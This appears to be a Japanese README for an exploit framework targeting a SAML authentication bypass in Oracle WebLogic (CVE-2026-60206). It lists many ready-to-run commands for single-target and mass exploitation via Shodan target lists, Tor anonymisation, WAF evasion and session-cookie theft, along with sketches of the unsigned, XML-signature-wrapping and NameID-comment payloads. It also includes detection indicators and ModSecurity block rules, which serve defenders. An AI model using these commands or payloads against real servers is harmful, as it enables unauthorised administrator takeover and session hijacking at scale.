
👾 CVE-2026-60206 - Oracle WebLogic SAML 認証バイパスエクスプロイトフレームワーク ⚡Bash & Python バージョン。機能: --detect 安全チェック、--exploit combo/unsigned/xsw/nameid/all、--shodan 統合、--tor サポート、マススキャン、JSON/CSV/JSONL 出力、Cookie 検証。🛡️ CVSS 9.9 クリティカル - 倫理的に使用し、法律を守ってください。🔒

エクスプロイトフレームワーク & 一括スキャナ
許可されたセキュリティテスト専用です。
本ツールは、教育および許可されたペネトレーションテストの目的にのみ提供されます。
著者および貢献者は、本ソフトウェアによって引き起こされた誤用または損害について一切の責任を負いません。ユーザーは、テスト前にターゲット所有者から明示的な書面による許可を得ていることを確認する単独の責任を負います。コンピュータシステムへの不正アクセスは、Computer Fraud and Abuse Act (CFAA) および世界各国の類似法の下で違法です。
本ソフトウェアを使用することにより、以下に同意したものとみなされます:
⚠️ 警告: この脆弱性は実環境で活発に悪用されています。不正使用は重大な法的結果を招く恐れがあります。
CVE-2026-60206 は、Oracle WebLogic Server の SAML (Security Assertion Markup Language) 実装における重大な未認証の認証バイパス脆弱性です。これにより、リモートの攻撃者は SAML 認証をバイパスし、有効な認証情報なしで WebLogic コンソールへの管理者アクセスを取得できます。
SAML インジェクション: この脆弱性は、SAML アサーションの不適切な検証に起因します。攻撃者は、認証チェックをバイパスする悪意のある SAML レスポンスを作成できます。
署名バイパス: この脆弱性により、XML Signature Wrapping (XSW) 攻撃を通じて XML 署名検証をバイパスできます。攻撃者は正当な署名で悪意のあるアサーションをラップします。
NameID の操作: 攻撃者はコメントを注入したり、NameID フィールドを操作して特権ユーザーになりすますことができます。
管理者アクセス: エクスプロイトに成功すると、攻撃者に WebLogic Server コンソールへの完全な制御を伴う管理者アクセスが付与されます。
この完全な教育用マルチエクスプロイトは、複数の SAML 攻撃ベクトルを連鎖させて認証バイパスを実現し、一括スキャン、クッキー、管理者アクセスのための高度な機能を備えています。
--detect)安全な検証ツールは、有害なペイロードを実行したりシステムに変更を加えたりすることなく、非侵襲的な脆弱性検出を実行します。
curl (Bash バージョン用)pip (requests ライブラリ用、Python バージョン)# Python version
pip install requests urllib3
# Optional: Shodan support
pip install shodan
# Bash version: curl only (no additional dependencies)
[!NOTE] Bash バージョンは
curlのみで動作し、外部依存関係はありません。Python バージョンではrequestsとurllib3が必要です (Shodan 統合にはオプションでshodan)。
exploit.py)# Single target exploit (combo mode)
python exploit.py -u https://192.168.1.100:7002 --exploit --user admin
# Exploit with all attack vectors
python exploit.py -u https://192.168.1.100:7002 --mode all --exploit -v
# Mass scanning from file (50 threads)
python exploit.py -l targets.txt --exploit -t 50 -o results.json
# Safe detection only (non-intrusive)
python exploit.py -l targets.txt --detect -o scan_results.csv
# Shodan integration
export SHODAN_API_KEY="your_api_key"
python exploit.py --shodan --shodan-query "WebLogic Server port:7002" --exploit
# Tor anonymized scanning
python exploit.py -l targets.txt --exploit --tor -t 20
# Proxy support
python exploit.py -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080
# Streaming JSONL output (memory efficient for large scans)
python exploit.py -l targets.txt --exploit -o results.jsonl
# Quiet mode (minimal output)
python exploit.py -l targets.txt --exploit -q -o results.json
# Custom timeout and retry
python exploit.py -u https://192.168.1.100:7002 --exploit --timeout 20 --retry 5 --delay 2.0
# SSL verification bypass
python exploit.py -u https://192.168.1.100:7002 --exploit --no-verify
# Verbose debugging
python exploit.py -u https://192.168.1.100:7002 --exploit -v
# Single target exploit
./exploit.sh -u https://192.168.1.100:7002 --exploit --user admin
# Mass scanning
./exploit.sh -l targets.txt --mode all --exploit -o results.json
# Tor anonymized scanning
./exploit.sh -l targets.txt --exploit --tor -t 20
# Shodan integration
export SHODAN_API_KEY="your_api_key"
./exploit.sh --shodan --exploit -o shodan_results.json
# Streaming JSONL output
./exploit.sh -l targets.txt --exploit -o results.jsonl
# Proxy support
./exploit.sh -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080
# SSL verification bypass
./exploit.sh -u https://192.168.1.100:7002 --exploit --no-verify
# Quiet mode
./exploit.sh -l targets.txt --exploit -q -o results.json
# Verbose debugging
./exploit.sh -u https://192.168.1.100:7002 --exploit -v
# Single target validation
./verifier_poc.sh -u https://192.168.1.100:7002 --user admin
# Mass validation with report
./verifier_poc.sh -l targets.txt --user admin -o report.txt
# SSL verification bypass
./verifier_poc.sh -u https://192.168.1.100:7002 --no-verify
# Proxy support
./verifier_poc.sh -u https://192.168.1.100:7002 --proxy http://127.0.0.1:8080
| Oracle WebLogic バージョン |
|---|
⚠️ 重要: この脆弱性は、セルフホスト型の WebLogic Server デプロイメントに影響します。直ちに Oracle CPU 2026年7月を適用してください。
この脆弱性により、攻撃者は、WebLogic の SAML 実装によって不適切に検証される悪意のある SAML レスポンスを作成することで、SAML 認証をバイパスできます。
脆弱なエンドポイント:
POST /saml2/sp/acs HTTP/1.1
Host: target:7002
Content-Type: application/x-www-form-urlencoded
SAMLResponse=<base64_encoded_malicious_assertion>&RelayState=/
署名なしアサーション
saml2:Assertion saml2:Subject <saml2:NameID Format="...">admin</saml2:NameID> </saml2:Subject>
</saml2:Assertion>
XML 署名ラッピング (XSW)
ds:Signature <ds:Reference URI="#legit"> </ds:Reference> </ds:Signature>
<saml2:Assertion ID="evil"> saml2:Subjectadmin</saml2:Subject> </saml2:Assertion>
NameID コメント注入
<saml2:NameID Format="...">
lowpriv</saml2:NameID>
エクスプロイトに成功すると JSESSIONID クッキーが取得でき、WebLogic コンソールへの管理者アクセスが付与されます。
窃取したクッキーを使用すると、以下へのアクセスが可能になります:
WebLogic ログで以下を検索してください:
access.log – 異常な SAML パラメータを含む /saml2/sp/acs、/saml2/acs へのリクエストdomain.log – 無効な SAML アサーションによる認証バイパスの試行diagnostic.log – SAML 解析エラーまたは署名検証の失敗SAMLResponse パラメータ:
<saml2:Assertion> タグ<saml2:NameID> フィールド内のコメントjavascript: または eval()config.xml、jps-config.xml)autodeploy ディレクトリ内の新しい WAR ファイルweblogic.security ファイル# Block SAML requests with multiple assertions
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10001,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - Multiple SAML Assertions',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*<saml2:Assertion>.*"
# Block SAML requests with comments in NameID
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10002,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - NameID Comments',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:NameID.*<!--.*-->.*"
# Block unsigned SAML assertions
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10003,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - Unsigned Assertion',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*(?!<ds:Signature>).*"
| 属性 | 値 |
|---|
| 📅 発見時期 | 2026年7月 (Oracle CPU) |
| ⚠️ CVSS スコア | 9.9 (CRITICAL) |
| 📋 CISA KEV | 2026年7月21日に追加 |
| 🎯 影響を受ける製品 | Oracle WebLogic Server (Fusion Middleware) |
| 🔄 修正済みバージョン | Oracle CPU 2026年7月 |
| 🔓 認証 | 不要 (Pre-Auth) |
| 🌍 活発な悪用 | 実環境での悪用が確認済み (2026年7月) |
| 機能 | 説明 |
|---|
| 🚀 マルチベクターエクスプロイト | 7 つの攻撃ベクトル: unsigned、xsw_v1-4、nameid、combo |
| 💻 一括スキャン | スレッドプール (Python) / FIFO (Bash) による並行スキャン |
| 🔐 クッキー窃取 | セッションハイジャック用に JSESSIONID を窃取 |
| 👑 管理者コンソールアクセス | WebLogic コンソールへの完全な管理者アクセス |
| 📁 バージョン検出 | WebLogic のバージョンと脆弱性の状態を検出 |
| 🌐 バッチスキャン | スレッド化による複数ターゲットの一括エクスプロイト |
| 🎯 安全な検出 | 非侵襲的な脆弱性検証のためのオプション --detect フラグ |
| 🧩 Shodan 統合 | Shodan 検索から直接ターゲットを読み込み |
| 🔍 Tor サポート | Tor プロキシによるスキャンの匿名化 |
| 📊 複数の出力形式 | JSON、CSV、JSONL ストリーミング出力 |
| 🪟 クロスプラットフォーム | Linux、macOS、BSD、Alpine、WSL をサポート |
| 🔒 スレッドセーフ | 並行操作にロック機構を使用 |
| 📋 セッション自動保存 | 成功したクッキーを後で使用するために保存 |
| ⚙️ WAF バイパス | User-Agent のローテーションとランダム遅延 |
| ベクトル | 説明 |
|---|
unsigned | 署名なしの未認証 SAML アサーション |
xsw_v1 | XML 署名ラッピング - 複数アサーション |
xsw_v2 | XSW - エンベロープ署名バイパス |
xsw_v3 | XSW - 名前空間の操作 |
xsw_v4 | XSW - 複数アサーションの注入 |
nameid | NameID コメント注入 |
combo | 複合攻撃 (unsigned + XSW + NameID) |
| 機能 | 説明 |
|---|
| 🔍 WebLogic 検出 | LoginForm.jsp を介して WebLogic インスタンスを識別 |
| 📊 バージョン検出 | 特定の WebLogic バージョンとパッチレベルを検出 |
| 🧪 SAML エンドポイントの発見 | SAML ACS エンドポイントをテスト |
| 🔒 非侵襲的 | 脆弱なバージョンのみを識別 |
| 📋 JSON/CSV 出力 | レポート用に結果をエクスポート |
| 🔄 一括スキャン | スレッドサポートで複数ターゲットをスキャン |
| ステータス |
|---|
| 12.2.1.4.0 | 🔴 脆弱 |
| 14.1.1.0.0 | 🔴 脆弱 |
| 14.1.2.0.0 | 🔴 脆弱 |
| 15.1.1.0.0 | 🔴 脆弱 |
| その他のバージョン | Oracle CPU 2026年7月を確認 |